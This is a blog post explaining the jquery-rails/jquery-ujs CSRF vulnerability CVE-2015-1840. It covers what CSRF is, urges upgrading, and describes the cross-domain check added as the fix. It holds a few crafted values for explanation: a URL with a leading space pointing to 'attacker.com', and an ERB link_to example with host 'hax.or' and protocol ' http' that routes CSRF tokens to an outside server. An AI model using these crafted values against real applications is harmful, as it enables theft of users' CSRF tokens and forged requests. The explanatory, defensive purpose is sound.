Understanding the jquery-rails CSRF vulnerability (CVE-2015-1840)

Several new security disclosures were released recently. One of them was for jquery-rails, the JavaScript library that implements "remote" links and forms in Rails. In this post we'll dissect the problem and see how it was fixed.

If you're on the Ruby on Rails security mailing list, you saw several new vulnerability disclosures come through yesterday. One of these caught my attention because it had to do with a front-end library jquery-rails. I thought it might be fun to dig into this vulnerability and see how it ticks.

First things first: if you use the jquery-rails gem or the jquery-ujs JavaScript library, go and upgrade to a patched version. These include jquery-rails versions 4.0.4 and 3.1.3 and jquery-ujs 1.0.4.

You can read the full vulnerability description here. I've also provided an excerpt below:

There is a vulnerability in jquery-ujs and jquery-rails that can be used to bypass CSP protections and allows attackers to send CSRF tokens to attacker domains. This vulnerability has been assigned the CVE identifier CVE-2015-1840.

Versions Affected: All.
Not affected: Applications which don't use jquery-ujs or jquery-rails.
Fixed Versions: jquery-rails versions 4.0.4 and 3.1.3 and jquery-ujs 1.0.4.

Impact

In the scenario where an attacker might be able to control the href attribute of an anchor tag or the action attribute of a form tag that will trigger a POST action, the attacker can set the href or action to " https://attacker.com" (note the leading space) that will be passed to JQuery, who will see this as a same origin request, and send the user's CSRF token to the attacker domain.

The vulnerability exposes CSRF tokens

There are a few major kinds of "hacks" that web applications are exposed to. One of these is called "cross site request forgery." Here's how it works:

[Image: A CSRF attack. Source: http://www.codeproject.com/KB/aspnet/556995/csrf3.jpg]

Suppose you're logged in to your bank's web app. As an evil hacker, I want to steal all of your money. So I add a special form to my own website and trick you into clicking on it. This malicious form submits a POST request to your bank's website, telling it to wire all your money to my account.

CSRF tokens prevent attacks like this from happening... unless the hacker can get his hands on a valid CSRF token.

So a vulnerability like this one isn't the end goal. Instead it's more like a stepping stone that a hacker can use to carry out more serious exploits.

This specific vulnerability depends on the fact that jquery-ujs submits CSRF tokens with certain requests. It has to. That's how Rails knows it's your code sending the request and not an attacker.

But what if a sneaky attacker was able to force jquery-ujs to send the request to a server he owned? Then he would be able to scoop up CSRF tokens from your users.

How could they send requests to their own servers? Well, if you use untrusted data to generate your link and form URLs, there is a way:

<%= link_to("Delete", unsafe_params, method: :delete) %>

Now if someone used your unsafe params to change the hostname, they could cause that request to be sent to any server they liked:

<%= link_to("Delete", {controller: :users, host: "hax.or", protocol: " http"}, method: :delete) %>

The vulnerability existed because jquery-ujs didn't check for cross-domain requests

The solution was to add a cross-domain check. It's pretty simple, as you can see in the commit.

The new isCrossDomain method is used to prevent the submission of XSRF tokens to other domains.

Starr Horne

Starr Horne is a Rubyist and Chief JavaScripter at Honeybadger.io. When she's not neck-deep in other people's bugs, she enjoys making furniture with traditional hand-tools, reading history and brewing beer in her garage in Seattle.